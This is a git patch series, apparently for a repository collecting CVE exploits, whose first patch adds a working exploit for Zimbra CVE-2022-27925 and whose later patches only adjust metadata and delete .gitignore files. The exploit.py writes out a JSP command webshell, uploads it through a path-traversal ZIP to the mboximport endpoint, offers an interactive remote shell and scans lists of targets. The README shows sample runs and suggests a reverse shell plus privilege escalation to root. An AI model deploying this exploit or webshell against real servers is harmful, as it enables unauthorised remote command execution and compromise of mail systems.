From bd8ed861814c63751ed7102dd7e5f2e36afd5acb Mon Sep 17 00:00:00 2001 From: Jessica Date: Wed, 15 Mar 2023 12:27:42 +0800 Subject: [PATCH 1/8] add cve-2022-27925 --- cve/Zimbra/2022/CVE-2022-27925/.gitignore | 129 +++++++++++++++++++ cve/Zimbra/2022/CVE-2022-27925/LICENSE | 21 ++++ cve/Zimbra/2022/CVE-2022-27925/README.md | 120 ++++++++++++++++++ cve/Zimbra/2022/CVE-2022-27925/exploit.py | 144 ++++++++++++++++++++++ cve/Zimbra/2022/yaml/CVE-2022-27925.yaml | 22 ++++ openkylin_list.yaml | 2 + 6 files changed, 438 insertions(+) create mode 100644 cve/Zimbra/2022/CVE-2022-27925/.gitignore create mode 100644 cve/Zimbra/2022/CVE-2022-27925/LICENSE create mode 100644 cve/Zimbra/2022/CVE-2022-27925/README.md create mode 100644 cve/Zimbra/2022/CVE-2022-27925/exploit.py create mode 100644 cve/Zimbra/2022/yaml/CVE-2022-27925.yaml diff --git a/cve/Zimbra/2022/CVE-2022-27925/.gitignore b/cve/Zimbra/2022/CVE-2022-27925/.gitignore new file mode 100644 index 00000000..b6e47617 --- /dev/null +++ b/cve/Zimbra/2022/CVE-2022-27925/.gitignore @@ -0,0 +1,129 @@ +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions +*.so + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +pip-wheel-metadata/ +share/python-wheels/ +*.egg-info/ +.installed.cfg +*.egg +MANIFEST + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.nox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +*.py,cover +.hypothesis/ +.pytest_cache/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py +db.sqlite3 +db.sqlite3-journal + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# IPython +profile_default/ +ipython_config.py + +# pyenv +.python-version + +# pipenv +# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. +# However, in case of collaboration, if having platform-specific dependencies or dependencies +# having no cross-platform support, pipenv may install dependencies that don't work, or not +# install all needed dependencies. +#Pipfile.lock + +# PEP 582; used by e.g. github.com/David-OConnor/pyflow +__pypackages__/ + +# Celery stuff +celerybeat-schedule +celerybeat.pid + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ +.dmypy.json +dmypy.json + +# Pyre type checker +.pyre/ diff --git a/cve/Zimbra/2022/CVE-2022-27925/LICENSE b/cve/Zimbra/2022/CVE-2022-27925/LICENSE new file mode 100644 index 00000000..a64218e3 --- /dev/null +++ b/cve/Zimbra/2022/CVE-2022-27925/LICENSE @@ -0,0 +1,21 @@ +MIT License + +Copyright (c) 2022 Jose Suarez + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/cve/Zimbra/2022/CVE-2022-27925/README.md b/cve/Zimbra/2022/CVE-2022-27925/README.md new file mode 100644 index 00000000..f9ef647c --- /dev/null +++ b/cve/Zimbra/2022/CVE-2022-27925/README.md @@ -0,0 +1,120 @@ +# CVE-2022-27925 + +# Description +On May 10, 2022, Zimbra released versions 9.0.0 patch 24 and 8.8.15 patch 31 to address multiple vulnerabilities in Zimbra Collaboration Suite, including CVE-2022-27924 (which we wrote about previously) and CVE-2022-27925. + +Originally, Zimbra called CVE-2022-27925 an authenticated path-traversal attack, where an administrative user could write files into any directory on the filesystem as the Zimbra account. Because it was originally thought to be an administrator-only attack, NVD assigned it a CVSS base score of 7.8. Later, Volexity noticed that attackers exploiting this vulnerability had found a way to bypass the administrative requirements, and wrote about it on August 10, 2022. This new authentication bypass got a new identifier – CVE-2022-37042. + +By combining the original path-traversal vulnerability and new authentication bypass, attackers can remotely compromise a Zimbra Collaboration Suite system via the administrator port (by default, 7071) anonymously. Combined with a currently unpatched privilege escalation vulnerability that we recently wrote about and wrote an exploit for, these three vulnerabilities lead to remote command execution as the root user on unpatched systems. + +Although the public advisories don’t mention it, according to our analysis, Zimbra Collaboration Suite Network Edition (the paid edition) is vulnerable, and the Open Source Edition (free) is not (since it does not have the vulnerable mboximport endpoint). Vulnerable versions are: + + Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) + Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) + +These vulnerablities (and others in Zimbra) are being targeted for widespread exploitation in the wild, and should therefore be patched or taken offline as soon as possible. If you suspect you’ve been compromised, Zimbra provides steps to rebuild your Zimbra Collaboration Suite server from scratch on the latest patch without losing data. + +Source: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis + +## Usage +``` + _____ _ __ +/__ / (_)___ ___ / /_ _________ _ + / / / / __ `__ \/ __ \/ ___/ __ `/ + / /__/ / / / / / / /_/ / / / /_/ / +/____/_/_/ /_/ /_/_.___/_/ \__,_/ + CVE-2022-27925 + +usage: exploit.py [-h] [-t TARGET] [-l LIST] + +options: + -h, --help show this help message and exit + -t TARGET, --target TARGET + URl with protocol HTTPS + -l LIST, --list LIST List of targets +``` + +# Example run + +``` +root@root# python exploit.py -t zimbra.example.com +_____ _ __ +/__ / (_)___ ___ / /_ _________ _ + / / / / __ `__ \/ __ \/ ___/ __ `/ + / /__/ / / / / / / /_/ / / / /_/ / +/____/_/_/ /_/ /_/_.___/_/ \__,_/ + CVE-2022-27925 + +[!] Testing URL: https://zimbra.example.com +[!] Target is up! +[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[+] Webshell works!! +[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp +[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux + +root@root# python exploit.py -l targets.txt + + _____ _ __ +/__ / (_)___ ___ / /_ _________ _ + / / / / __ `__ \/ __ \/ ___/ __ `/ + / /__/ / / / / / / /_/ / / / /_/ / +/____/_/_/ /_/ /_/_.___/_/ \__,_/ + CVE-2022-27925 + +[!] Testing URL: https://patched.example.com +[!] Target is up! +[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[-] Target not vulnerable +[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[-] Target not vulnerable +[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[-] Target not vulnerable +[!] Testing URL: https://zimbra.example.com +[!] Target is up! +[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[+] Webshell works!! +[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp +[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux +[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[+] Webshell works!! +[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp +[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux +[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[+] Webshell works!! +[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp +[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux +[!] Testing URL: https://patched.example.com +[!] Target is up! +[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[-] Target not vulnerable +[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[-] Target not vulnerable +[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/ +[!] Exploiting! +[!] Testing webshell +[-] Target not vulnerable + +root@root# . +``` + +# Root the box! + +To root the box you can call a reverse shell, and then use [Slaper's LPE](https://github.com/darrenmartyn/zimbra-slapper) diff --git a/cve/Zimbra/2022/CVE-2022-27925/exploit.py b/cve/Zimbra/2022/CVE-2022-27925/exploit.py new file mode 100644 index 00000000..3a952699 --- /dev/null +++ b/cve/Zimbra/2022/CVE-2022-27925/exploit.py @@ -0,0 +1,144 @@ +import argparse +import zipfile +import io +import random +import string +import requests +from urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) + + +webshell_payload = r'<%@ page import="java.util.*,java.io.*"%><%%>
<%if (request.getParameter("cmd") != null) {    out.println("Command: " + request.getParameter("cmd") + "
");    Process p;    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));    }    else{        p = Runtime.getRuntime().exec(request.getParameter("cmd"));    }    OutputStream os = p.getOutputStream();    InputStream in = p.getInputStream();    DataInputStream dis = new DataInputStream(in);    String disr = dis.readLine();    while ( disr != null ) {    out.println(disr);    disr = dis.readLine();    }}%>
' +char_set = string.ascii_uppercase + string.digits +webshell_name = ''.join(random.sample(char_set*6, 6)) + '.jsp' +#vuln_paths = ["service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd", "service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1"] +BLUE = "\033[1;34m" +CYAN = "\033[1;36m" +GREEN = "\033[0;32m" +RED = "\033[31m" + +ITERATE = False + + +def banner(): + return CYAN+''' + _____ _ __ +/__ / (_)___ ___ / /_ _________ _ + / / / / __ `__ \/ __ \/ ___/ __ `/ + / /__/ / / / / / / /_/ / / / /_/ / +/____/_/_/ /_/ /_/_.___/_/ \__,_/ + CVE-2022-27925 + ''' + +# FIX URL +def fix_url(url): + if not url.startswith('https://'): + url = 'https://' + url + url = url.rstrip("/") + return url + +def build_zip(jsp, path): + zip_buffer = io.BytesIO() + zf = zipfile.ZipFile(zip_buffer, 'w') + zf.writestr(path, jsp) + zf.close() + return zip_buffer.getvalue() + +def exploit(host, payload, cmd): + headers = {'content-Type': 'application/x-www-form-urlencoded'} + try: + r = requests.post( + host + '', data=payload, headers=headers, verify=False, timeout=20) + r = requests.post( + host + '/service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1', data=payload, headers=headers, verify=False, timeout=20) + print(GREEN + '[!] Testing webshell') + r = requests.get(host + '/zimbraAdmin/' + webshell_name + + '?cmd=' + cmd, verify=False, timeout=20) + if "Josexv1" in r.text: + print(CYAN + '[+] Webshell works!!') + print(GREEN + '[+] WebShell location: ' + + host + '/zimbraAdmin/' + webshell_name + "") + r = requests.get(host + '/zimbraAdmin/' + webshell_name + + '?cmd=uname+-a' , verify=False, timeout=20) + print(BLUE + '[+] Uname -a output: '+ CYAN + r.text.split('
') + [1].split('
')[0].strip()) + return True + else: + print(RED + '[-] Target not vulnerable') + return False + except: + print(RED + '[!] Connection error') + +def ping_url(url): + try: + r = requests.get(url, verify=False, timeout=10) + if r.status_code == 200: + print(CYAN + '[!] Target is up!') + return True + else: + print(RED + '[!] Target is down! Next >> \n') + return False + except: + return False + +def main(url): + paths = [ + '../../../../mailboxd/webapps/zimbraAdmin/', + '../../../../jetty_base/webapps/zimbraAdmin/', + '../../../../jetty/webapps/zimbraAdmin/'] + work = 0 + try: + for num in range(0, 3): + print( + GREEN + '[!] Creating malicious ZIP path: ' + BLUE + paths[num]) + zippedfile = build_zip(webshell_payload, paths[num]+webshell_name) + print(GREEN + '[!] Exploiting!') + if exploit(url, zippedfile, 'echo "Josexv1"'): + if args.target: + answer = input( + CYAN + '[+] Want to interact with webshell via terminal? (y/n): ') + if answer == "y": + print(GREEN + '[!] Sending commands to: ' + + url + '/zimbraAdmin/' + webshell_name) + while True: + cmd = input(GREEN + "[+] $ > " + BLUE) + if cmd == "exit": + break + req = requests.get( + url + "/zimbraAdmin/" + webshell_name + "?cmd=" + cmd, verify=False, timeout=20) + try: + print(CYAN + req.text.split('
') + [1].split('
')[0].strip()) + except: + print(RED + "[!] Error ?") + else: + print(RED + '[!] Bye!') + exit() + except: + print(RED + '[!] URL Error') + ITERATE = True + +if __name__ == "__main__": + print(banner()) + parser = argparse.ArgumentParser() + parser.add_argument( + '-t', '--target', help='URl with protocol HTTPS', default=False) + parser.add_argument("-l", "--list", action="store", + help="List of targets", default=False) + args = parser.parse_args() + if args.target is not False: + url = fix_url(args.target) + print(GREEN + '[!] Testing URL: '+ url) + if ping_url(url): + main(url) + elif args.list is not False: + with open(args.list, "rb") as targets: + for target in targets: + target = target.rstrip().decode("utf-8") + url = fix_url(target) + print(GREEN + '[!] Testing URL: '+ url) + if ping_url(url): + main(url) + else: + parser.print_help() + parser.exit() diff --git a/cve/Zimbra/2022/yaml/CVE-2022-27925.yaml b/cve/Zimbra/2022/yaml/CVE-2022-27925.yaml new file mode 100644 index 00000000..966e90dd --- /dev/null +++ b/cve/Zimbra/2022/yaml/CVE-2022-27925.yaml @@ -0,0 +1,22 @@ +id: CVE-2022-27925 +source: https://github.com/Josexv1/CVE-2022-27925 +info: + name: Zimbra提供一套开源协同办公套件包括WebMail,日历,通信录,Web文档管理和创作。 + severity: high + description: | + Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal. + scope-of-influence: + ZCS < 8.8.15 patch 33 + ZCS < 9.0.0 patch 26 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-27925 + - http://packetstormsecurity.com/files/168146/Zimbra-Zip-Path-Traversal.html + - https://wiki.zimbra.com/wiki/Security_Center + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-27925 + cwe-id: CWE-434 + cnvd-id: None + kve-id: None + tags: CVE-2022, 网络存储 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 5a8b7367..02a9adc7 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -93,6 +93,8 @@ cve: - CVE-2022-31144 java-spring: - CVE-2020-5398 + Zimbra: + - CVE-2022-27925 cnvd: apache-tomcat: - CNVD-2020-10487 -- Gitee From 52d21592daf223397829b03636625d3b118b0138 Mon Sep 17 00:00:00 2001 From: Jessica Date: Wed, 15 Mar 2023 04:39:00 +0000 Subject: [PATCH 2/8] update cve/Zimbra/2022/yaml/CVE-2022-27925.yaml. Signed-off-by: Jessica --- cve/Zimbra/2022/yaml/CVE-2022-27925.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/Zimbra/2022/yaml/CVE-2022-27925.yaml b/cve/Zimbra/2022/yaml/CVE-2022-27925.yaml index 966e90dd..41960416 100644 --- a/cve/Zimbra/2022/yaml/CVE-2022-27925.yaml +++ b/cve/Zimbra/2022/yaml/CVE-2022-27925.yaml @@ -19,4 +19,4 @@ info: cwe-id: CWE-434 cnvd-id: None kve-id: None - tags: CVE-2022, 网络存储 \ No newline at end of file + tags: CVE-2022, 文件上传 \ No newline at end of file -- Gitee From 8399fc2da0ab16078a563bd149d67f6d3d1b0e6b Mon Sep 17 00:00:00 2001 From: Jessica Date: Wed, 15 Mar 2023 04:48:12 +0000 Subject: [PATCH 3/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?Zimbra/2022/CVE-2022-27925/.gitignore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/Zimbra/2022/CVE-2022-27925/.gitignore | 129 ---------------------- 1 file changed, 129 deletions(-) delete mode 100644 cve/Zimbra/2022/CVE-2022-27925/.gitignore diff --git a/cve/Zimbra/2022/CVE-2022-27925/.gitignore b/cve/Zimbra/2022/CVE-2022-27925/.gitignore deleted file mode 100644 index b6e47617..00000000 --- a/cve/Zimbra/2022/CVE-2022-27925/.gitignore +++ /dev/null @@ -1,129 +0,0 @@ -# Byte-compiled / optimized / DLL files -__pycache__/ -*.py[cod] -*$py.class - -# C extensions -*.so - -# Distribution / packaging -.Python -build/ -develop-eggs/ -dist/ -downloads/ -eggs/ -.eggs/ -lib/ -lib64/ -parts/ -sdist/ -var/ -wheels/ -pip-wheel-metadata/ -share/python-wheels/ -*.egg-info/ -.installed.cfg -*.egg -MANIFEST - -# PyInstaller -# Usually these files are written by a python script from a template -# before PyInstaller builds the exe, so as to inject date/other infos into it. -*.manifest -*.spec - -# Installer logs -pip-log.txt -pip-delete-this-directory.txt - -# Unit test / coverage reports -htmlcov/ -.tox/ -.nox/ -.coverage -.coverage.* -.cache -nosetests.xml -coverage.xml -*.cover -*.py,cover -.hypothesis/ -.pytest_cache/ - -# Translations -*.mo -*.pot - -# Django stuff: -*.log -local_settings.py -db.sqlite3 -db.sqlite3-journal - -# Flask stuff: -instance/ -.webassets-cache - -# Scrapy stuff: -.scrapy - -# Sphinx documentation -docs/_build/ - -# PyBuilder -target/ - -# Jupyter Notebook -.ipynb_checkpoints - -# IPython -profile_default/ -ipython_config.py - -# pyenv -.python-version - -# pipenv -# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. -# However, in case of collaboration, if having platform-specific dependencies or dependencies -# having no cross-platform support, pipenv may install dependencies that don't work, or not -# install all needed dependencies. -#Pipfile.lock - -# PEP 582; used by e.g. github.com/David-OConnor/pyflow -__pypackages__/ - -# Celery stuff -celerybeat-schedule -celerybeat.pid - -# SageMath parsed files -*.sage.py - -# Environments -.env -.venv -env/ -venv/ -ENV/ -env.bak/ -venv.bak/ - -# Spyder project settings -.spyderproject -.spyproject - -# Rope project settings -.ropeproject - -# mkdocs documentation -/site - -# mypy -.mypy_cache/ -.dmypy.json -dmypy.json - -# Pyre type checker -.pyre/ -- Gitee From 5cc97c2392e26bd1d65fe858dec173fe1fdc687f Mon Sep 17 00:00:00 2001 From: Jessica Date: Wed, 15 Mar 2023 04:54:29 +0000 Subject: [PATCH 4/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2022/CVE-2022-1015/.gitignore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2022/CVE-2022-1015/.gitignore | 4 ---- 1 file changed, 4 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-1015/.gitignore diff --git a/cve/linux-kernel/2022/CVE-2022-1015/.gitignore b/cve/linux-kernel/2022/CVE-2022-1015/.gitignore deleted file mode 100644 index 82c8d00a..00000000 --- a/cve/linux-kernel/2022/CVE-2022-1015/.gitignore +++ /dev/null @@ -1,4 +0,0 @@ -*.o -build/ -bin/ -pwn -- Gitee From 7d43d5fdd612dda957d3bc868fe45ed617d4892f Mon Sep 17 00:00:00 2001 From: Jessica Date: Wed, 15 Mar 2023 04:55:42 +0000 Subject: [PATCH 5/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache-tomcat/2020/CVE-2020-13935/.gitignore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-tomcat/2020/CVE-2020-13935/.gitignore | 1 - 1 file changed, 1 deletion(-) delete mode 100755 cve/apache-tomcat/2020/CVE-2020-13935/.gitignore diff --git a/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore b/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore deleted file mode 100755 index 0f421f64..00000000 --- a/cve/apache-tomcat/2020/CVE-2020-13935/.gitignore +++ /dev/null @@ -1 +0,0 @@ -tcdos -- Gitee From 4267ad7032eb86f6c236bf9215934b3300fdcbdb Mon Sep 17 00:00:00 2001 From: Jessica Date: Wed, 15 Mar 2023 04:56:28 +0000 Subject: [PATCH 6/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2022/CVE-2022-25258/.gitignore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../2022/CVE-2022-25258/.gitignore | 129 ------------------ 1 file changed, 129 deletions(-) delete mode 100644 cve/linux-kernel/2022/CVE-2022-25258/.gitignore diff --git a/cve/linux-kernel/2022/CVE-2022-25258/.gitignore b/cve/linux-kernel/2022/CVE-2022-25258/.gitignore deleted file mode 100644 index b6e47617..00000000 --- a/cve/linux-kernel/2022/CVE-2022-25258/.gitignore +++ /dev/null @@ -1,129 +0,0 @@ -# Byte-compiled / optimized / DLL files -__pycache__/ -*.py[cod] -*$py.class - -# C extensions -*.so - -# Distribution / packaging -.Python -build/ -develop-eggs/ -dist/ -downloads/ -eggs/ -.eggs/ -lib/ -lib64/ -parts/ -sdist/ -var/ -wheels/ -pip-wheel-metadata/ -share/python-wheels/ -*.egg-info/ -.installed.cfg -*.egg -MANIFEST - -# PyInstaller -# Usually these files are written by a python script from a template -# before PyInstaller builds the exe, so as to inject date/other infos into it. -*.manifest -*.spec - -# Installer logs -pip-log.txt -pip-delete-this-directory.txt - -# Unit test / coverage reports -htmlcov/ -.tox/ -.nox/ -.coverage -.coverage.* -.cache -nosetests.xml -coverage.xml -*.cover -*.py,cover -.hypothesis/ -.pytest_cache/ - -# Translations -*.mo -*.pot - -# Django stuff: -*.log -local_settings.py -db.sqlite3 -db.sqlite3-journal - -# Flask stuff: -instance/ -.webassets-cache - -# Scrapy stuff: -.scrapy - -# Sphinx documentation -docs/_build/ - -# PyBuilder -target/ - -# Jupyter Notebook -.ipynb_checkpoints - -# IPython -profile_default/ -ipython_config.py - -# pyenv -.python-version - -# pipenv -# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. -# However, in case of collaboration, if having platform-specific dependencies or dependencies -# having no cross-platform support, pipenv may install dependencies that don't work, or not -# install all needed dependencies. -#Pipfile.lock - -# PEP 582; used by e.g. github.com/David-OConnor/pyflow -__pypackages__/ - -# Celery stuff -celerybeat-schedule -celerybeat.pid - -# SageMath parsed files -*.sage.py - -# Environments -.env -.venv -env/ -venv/ -ENV/ -env.bak/ -venv.bak/ - -# Spyder project settings -.spyderproject -.spyproject - -# Rope project settings -.ropeproject - -# mkdocs documentation -/site - -# mypy -.mypy_cache/ -.dmypy.json -dmypy.json - -# Pyre type checker -.pyre/ -- Gitee From 453661b8519d07c27da42d5064bfca77633a6290 Mon Sep 17 00:00:00 2001 From: Jessica Date: Wed, 15 Mar 2023 04:57:06 +0000 Subject: [PATCH 7/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?openssl/2021/CVE-2021-3449/.gitignore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/openssl/2021/CVE-2021-3449/.gitignore | 1 - 1 file changed, 1 deletion(-) delete mode 100644 cve/openssl/2021/CVE-2021-3449/.gitignore diff --git a/cve/openssl/2021/CVE-2021-3449/.gitignore b/cve/openssl/2021/CVE-2021-3449/.gitignore deleted file mode 100644 index 35ebe595..00000000 --- a/cve/openssl/2021/CVE-2021-3449/.gitignore +++ /dev/null @@ -1 +0,0 @@ -/cve-2021-3449 -- Gitee From 4610b9f000f5228d282058c5e2be3b6fd0a8f03a Mon Sep 17 00:00:00 2001 From: Jessica Date: Wed, 15 Mar 2023 04:57:50 +0000 Subject: [PATCH 8/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?samba/2021/CVE-2021-44142/.idea/.gitignore?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/samba/2021/CVE-2021-44142/.idea/.gitignore | 8 -------- 1 file changed, 8 deletions(-) delete mode 100644 cve/samba/2021/CVE-2021-44142/.idea/.gitignore diff --git a/cve/samba/2021/CVE-2021-44142/.idea/.gitignore b/cve/samba/2021/CVE-2021-44142/.idea/.gitignore deleted file mode 100644 index 13566b81..00000000 --- a/cve/samba/2021/CVE-2021-44142/.idea/.gitignore +++ /dev/null @@ -1,8 +0,0 @@ -# Default ignored files -/shelf/ -/workspace.xml -# Editor-based HTTP Client requests -/httpRequests/ -# Datasource local storage ignored files -/dataSources/ -/dataSources.local.xml -- Gitee